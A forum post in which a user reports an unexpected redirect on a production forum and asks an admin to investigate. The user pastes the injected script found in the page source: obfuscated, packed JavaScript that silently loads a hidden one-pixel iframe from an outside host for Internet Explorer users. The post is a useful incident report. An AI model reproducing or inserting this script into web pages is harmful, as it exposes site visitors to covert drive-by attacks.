just clicked my bookmark for the production forum and noticed I was being redirected.. hit ESC to stop the page loading and viewed the html source..
this was the first line:
Code:
<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 8(){b=4.h(\'9\');6(!b){a 0=4.j(\'k\');4.m.g(0);0.n=\'9\';0.5.f=\'7\';0.5.c=\'7\';0.5.d=\'e\';0.l=\'C://z.y.o/A.B?t=D\'}}a 2=x.w.q();6(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){4.u=8}',40,40,'el||ua|indexOf|document|style|if|1px|MakeFrameEx|yahoo_api|var|element|height|display|none|width|appendChild|getElementById|function|createElement|iframe|src|body|id|com|msie|toLowerCase|opera|webtv||onmousemove|windows|userAgent|navigator|acmetoy|zint|showthread|php|http|74891689'.split('|'),0,{}))
</script>
can an admin please check into this?
edit: found some stuff through google about this being a bug related to SEO forum plugins (search engine optimization) and can be exploited remotely.. maybe this is the case?
Login
Register
FAQ
